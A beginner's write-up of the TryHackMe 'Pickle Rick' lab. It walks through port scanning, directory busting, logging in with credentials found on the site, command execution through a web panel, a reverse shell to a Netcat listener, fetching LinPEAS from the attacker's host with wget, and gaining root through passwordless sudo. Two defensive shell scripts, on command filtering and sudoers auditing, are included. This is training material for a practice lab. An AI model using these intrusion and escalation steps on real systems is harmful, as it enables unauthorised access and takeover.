Pickle Rick


The link for this lab is located here: https://tryhackme.com/room/picklerick


This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.


Walkthrough for Beginners

The first thing I do for every room is to perform an initial nmap scan that targets all ports (1-65535) to get a quick overview of what ports are open. To do this, I use the syntax “nmap -T4 -p- -oA initialscan [IP]” where:

  • -T4 specifies the speed settings (T1 being the slowest, T5 the fastest)

  • -p- specifies all ports

  • -oA initialscan outputs in all three formats (normal, XML and grepable) with the base name initialscan

  • [IP] is the target machine

[Image: nmap initial scan]

The scan reveals that port 22 and port 80 are open.

The next step is to perform a more intensive scan on these two ports only, to learn more about version numbers, possibly the OS, and any other details. The syntax for this is “nmap -A -sV -T4 -p22,80 -oA servicescan [IP]” where:

  • -A performs OS detection, version detection, script scanning, and traceroute

  • -sV performs service version detection

  • -T4 specifies the speed

  • -p22,80 specifies only two ports (22 and 80)

  • -oA servicescan outputs in all formats with the base name servicescan

  • [IP] is the target machine

[Image: nmap service scan]

This reveals that the HTTP web page has a title of “Rick is sup4r cool” and that the OS has been detected as Linux (possibly Ubuntu, as indicated by the SSH version banner). There is not much information to go on right now, but this does tell us that a website is running.

The next step is to visit the site to perform some enumeration.

[Image: webpage]

As we can see, there is a very basic website here. Since there is nowhere we can navigate to right now, a good source of information is the source code. Looking at the source code for the main page reveals an interesting comment:

[Image: username in source code]

We now have a username that we could possibly use later - take note of it!

If there is a username, this likely indicates that there is a login page somewhere, possibly for admin or normal users. To discover these possible pages, we can use a directory busting tool such as DirBuster or Gobuster (or any other you prefer). For me, I will be using Gobuster with the syntax:

gobuster dir -u http://10.10.79.158 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,html,bak

  • dir -u http://10.10.79.158 specifies the website to directory bust

  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt specifies the wordlist to use

  • -x php,txt,zip,html,bak specifies the type of files to look for (in this case PHP, text files, backups, and HTML pages)

After a short while, Gobuster will start to return some interesting results:

[Image: gobuster results]

The “robots.txt” file usually lists directories that web developers do NOT want search engines such as Google to crawl and display. Checking that file could reveal some interesting hidden directories:

[Image: robots.txt]

As you can see, there is an interesting piece of text in here but no hidden directories. Keep note of this in case we find a user for it later!

For now, we can go back to the Gobuster results as we have two interesting pages left to look at. As you can see, there is a login.php page which is very interesting considering we found a username in the source code. Navigating to it reveals a simple login page:

[Image: login page]

We know we have a username (R1ckRul3s) but we don’t know the password yet. Or do we? What if we try that random string we found in robots.txt (Wubbalubbadubdub) as the password? Upon entering these potential credentials and hitting Enter, we get successfully logged in and redirected to another page that looks like an admin panel with a “Command Panel”.

[Image: command panel]

Knowing that this is a Linux system (thanks to our nmap scan), we could try some very simple Linux commands to see if we have access to the system through this panel. Running a simple “ls” command to list the files in the current directory reveals that we can indeed run Linux commands.

[Image: ls command output]

Next, we can try running some more basic commands such as “pwd” to see where we are and “whoami” to see if we are possibly the root user.

[Image: pwd output]
[Image: whoami output (www-data)]

We can see that through this command portal we are running as the “www-data” user and are currently in the /var/www/html directory (which is the default document root of the web server).

Going back to the “ls” command we executed, we see an interesting text file called “Sup3rS3cretPickl3Ingred.txt”.

Looking at the other files in the output, we see pages we have already visited such as login.php and index.html (the home page). This tells us that all these files are in the document root of the web server. Knowing this, we can try to access the .txt file simply by appending its name to the end of the web address.

[Image: first ingredient]

There we go! Simply navigating to it revealed our first ingredient.

We also saw another file called “clue.txt” which, as the name suggests, could give us some clues as to where the other ingredients are. If we open it the same way we just did, by appending it to the address, we get a hint.

[Image: clue.txt]

This tells us to look around the file system. Going back to the “Command Panel”, we know it is acting like a normal terminal on Linux where we can use various commands. One of the most important directories to check for important files is the /home directory, which reveals the configured users and possibly files inside their sub-directories. If we run the “ls /home” command we see two directories belonging to users - rick and ubuntu.

[Image: ls /home output]

The “ubuntu” directory seems like a default directory on the Linux system itself, but the “rick” directory is most certainly a deliberately configured user. If we list the contents of the “/home/rick” directory via “ls /home/rick”, it reveals an interesting file.

[Image: ls /home/rick output]

We have found the second ingredient. To read the contents of this file, we can try using the cat command followed by the full file path - cat /home/rick/second\ ingredients. (NOTE: the backslash after “second” is needed because of the space in the filename.)

[Image: command disabled message]

We’ve run into a roadblock. The “cat” command for reading files is disabled.

At this point, we could try going through every command that allows us to read files in Linux, such as “more”, “less”, “tail”, “head” and many more. But the more interesting way, in my opinion, is to try and get a reverse shell from this command panel.
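To see why disabling a single command is such a weak control, here is an added example of my own (not the lab’s PHP) that contrasts a stand-in for the panel’s denylist with the allowlist a defender would use instead. The two check functions and the set of verbs they permit are assumptions for this illustration.

```shell
#!/bin/sh
# Added example: two ways a web "Command Panel" could vet user input.
# denylist_check is a stand-in for the lab's filter (it refuses "cat");
# allowlist_check is the hardened alternative. Neither executes anything.

# Denylist: reject only when the bare word "cat" appears. Any other reader
# ("more", "less", "head") or a wrapper such as bash -c '...' slips past.
denylist_check() {
    case " $1 " in
        *" cat "*) echo REJECT ;;
        *)         echo ACCEPT ;;
    esac
}

# Allowlist: accept a small fixed set of verbs, and only when every argument
# is made of plain path characters. Shell metacharacters (; | & $ ` < > quotes)
# are rejected before the verb is even looked at, so chaining and substitution
# cannot be smuggled in. The allowed verbs are an assumption for this example.
allowlist_check() {
    verb=${1%% *}
    args=${1#"$verb"}
    if printf '%s\n' "$args" | grep -q '[^A-Za-z0-9/_. -]'; then
        echo REJECT
        return 0
    fi
    case "$verb" in
        ls|pwd|whoami|uptime) echo ACCEPT ;;
        *)                    echo REJECT ;;
    esac
}

# Demo run using the walkthrough's own inputs: the denylist blocks plain cat
# but lets the alternatives through; the allowlist blocks all of them.
for cmd in 'ls /home/rick' 'cat /home/rick/second ingredients' \
           'more /home/rick/second ingredients' "bash -c 'cat /root/3rd.txt'"; do
    printf '%-40s denylist=%s allowlist=%s\n' "$cmd" \
        "$(denylist_check "$cmd")" "$(allowlist_check "$cmd")"
done
```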

If we navigate to the trusty Pentest Monkey reverse shell cheat sheet, we have a variety of options for getting a reverse shell connection, depending on what is installed and running on the victim machine. Looking at the first one on the linked page, we see that it is a Bash reverse shell.

Knowing that this is a Linux system, we can try this one first. Before we try any of these commands, however, make sure that you have a Netcat listener set up to catch the connection. For me, I have one running on port 5184 (use any port you want as long as it’s free) via the command nc -nvlp 5184

[Image: Netcat listener]

Now we can try the Bash reverse shell by first changing the IP and port in the command - change 10.0.0.1 to your TryHackMe IP and 8080 to the port you selected in the Netcat command - and then pasting it into the Command Panel and hitting Execute.

Unfortunately, nothing will happen. However, this is not the Command Panel’s fault. A little research on the bash command reveals that to run a full command string you need to pass it to “bash -c”.

[Image: bash -c documentation]

If we put that in front and put single quotation marks around the reverse shell from Pentest Monkey, it could work.

[Image: bash reverse shell in command panel]

When hitting Execute, the webpage will be stuck in a loading loop. However, if we go back to our Netcat listener in our terminal, we should (hopefully) have a shell.

[Image: shell caught by Netcat]

Bingo! We now have a shell on the target machine with no restricted commands (at least none that don’t require root privileges), meaning we can run the cat command on the /home/rick/second ingredients file and get our second ingredient.

[Image: second ingredient]

Now that we have access to this machine, the next step is to escalate our privileges. There are multiple ways to do this, both manually and automated. My preferred method is to use a tool called LinPEAS, which runs a bunch of checks that could reveal privilege escalation vulnerabilities on the machine for us.

Download the script either using git clone or by copying and pasting the code from the link into a file on your machine and saving it as linpeas.sh. For me, I simply cloned the whole repository to my machine using git clone:

[Image: git clone of LinPEAS]

Once downloaded, we need to get the LinPEAS script onto our target. Again, there are multiple ways to get this done. The simplest is to host a web server on our local machine using Python3 and download the file using wget on the target machine.

The first step is to host a web server in the directory where the LinPEAS script is located. Navigate to that directory and use the following command: sudo python3 -m http.server 80

[Image: python3 http.server]

This simply starts a web server on our local machine which serves all the files in the current directory. Next, we can go back to the victim machine and use the “wget” command followed by our TryHackMe IP and the file we want to download - in my case it would be “wget http://10.11.3.112/linpeas.sh”

[Image: wget output]

It has now been successfully downloaded onto our victim machine. Before we run it, we have to make sure it has execute permissions (or else it won’t run). To do this, we simply add execute permissions via the chmod command: chmod +x linpeas.sh

[Image: chmod +x linpeas.sh]

Perfect! Now all we need to do is run it and wait until it finishes - it produces a massive amount of output, so just be patient. To run it, use the syntax “./linpeas.sh”.

[Image: LinPEAS running]

Once it has finished running, we can scroll through carefully, using the legend provided at the top, and look for anything critical or interesting. Scrolling down a little, we notice a very interesting section relating to sudo permissions.

[Image: LinPEAS sudo permissions section]

This means we can run ANY command as the root user without having to specify a password - very useful for attackers! We could simply list the contents of the “/root” directory using sudo and possibly cat the file inside, but a better way is to get a shell as root.
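A quick way to catch this misconfiguration before an attacker does: an added example of my own (not part of the walkthrough or of LinPEAS) that reads sudoers text and flags passwordless grants. The sample sudoers content is constructed to mirror the finding above; the www-data line is the risky one.

```shell
#!/bin/sh
# Added example: flag sudoers entries that grant passwordless sudo.
# SAMPLE_SUDOERS is constructed for this demo; the www-data line reproduces
# the kind of "(ALL) NOPASSWD: ALL" grant that LinPEAS surfaced in the room.
SAMPLE_SUDOERS='# /etc/sudoers (constructed sample)
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
www-data        ALL=(ALL) NOPASSWD: ALL
deploy          ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
%admin          ALL=(ALL) ALL'

# audit_sudoers: read sudoers text on stdin, print one line per NOPASSWD grant.
#   RISK - any command as root without a password (the lab's misconfiguration)
#   WARN - specific commands without a password (review each one)
# Comments and Defaults lines are skipped; entries that still require a
# password produce no output.
audit_sudoers() {
    grep -Ev '^[[:space:]]*(#|Defaults)' |
    while IFS= read -r line; do
        case "$line" in
            *NOPASSWD:*)
                user=$(printf '%s\n' "$line" | awk '{print $1}')
                # command list after "NOPASSWD:", leading whitespace removed
                cmds=$(printf '%s\n' "${line##*NOPASSWD:}" | sed 's/^[[:space:]]*//')
                # drop all spaces so "ALL" can be matched as a whole list item
                case ",$(printf '%s\n' "$cmds" | tr -d ' \t')," in
                    *,ALL,*) echo "RISK $user: passwordless sudo for ANY command" ;;
                    *)       echo "WARN $user: passwordless sudo for $cmds" ;;
                esac ;;
        esac
    done
}

# Demo against the constructed sample. On a real host run it as root with:
#   cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

The fix for a RISK hit is to remove the grant or narrow it to the specific binaries the account needs (the deploy line shows the shape), which the script then reports as WARN for review rather than RISK.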

Knowing we can execute ANY command as root, we can simply run the “bash” command with sudo in front of it to get a shell as root.

[Image: root shell via sudo bash]

Using only the first command does work, but we don’t get the nice-looking shell we had before, and it can be unstable in certain circumstances. To fix this, we simply stabilize it by using Python3 to spawn a nicer Bash shell with the current directory and user shown on the left, as we are used to; this article explains it very well and gives multiple ways to get an upgraded shell for future use.

Once we have this fully functioning shell, we can simply navigate to the “/root” directory and list its contents via ls.

[Image: ls /root output]

There is an interesting file called “3rd.txt” which could be our third ingredient. Reading its contents, we can see that it is indeed the third ingredient, and we have successfully completed this room!

[Image: third ingredient]

I hope you learned something from this room and had a lot of fun. Congratulations on completing it, and good luck in continuing your ethical hacking journey! Thanks for reading!
